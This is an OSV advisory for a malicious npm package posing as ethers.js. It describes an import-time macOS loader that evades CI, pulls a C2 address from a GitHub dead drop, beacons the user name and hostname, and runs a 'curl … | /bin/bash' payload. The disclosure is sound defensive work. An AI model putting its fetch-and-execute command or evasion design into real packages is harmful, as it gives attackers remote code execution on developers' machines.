@403name/ether-js@1.0.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5548
Ecosystem
npm
Summary
On require('@403name/ether-js'), index.js runs an IIFE that targets macOS only: it returns early on non-darwin platforms and whenever the CI or GITHUB_ACTIONS environment variables are set. It then writes a one-shot marker at ~/.cache/.nyx-npm/e, waits a randomized 30-90 s, and fetches a C2 base URL from the dead drop at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt. It beacons the installer's USER environment variable and os.hostname() to <c2>/api/clickfix-callback via curl, then spawns '/bin/sh -c' with curl -sSfL <c2>/api/payload/ | /bin/bash as a detached, disowned child: attacker-controlled remote code execution on the developer's machine.

Because the loader runs on import rather than from an install hook, tooling that only inspects package.json lifecycle scripts never sees it; a Russian-language comment in the source states this explicitly, saying the design avoids lifecycle scripts in order to be 'invisible to npm audit'.

The package name and description impersonate the popular ethers.js library ('Compatible with ethers.js API patterns for easy migration'), and the shipped keccak256 is a stub that returns random hex rather than a real hash, confirming that the package is a lure, not a functional library. The evasion pattern (platform gate, CI gate, randomized delay, one-shot marker) combined with the two-stage dead-drop-to-C2 fetch-and-exec is conclusive evidence of malicious intent.
Source: amazon-inspector (927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef)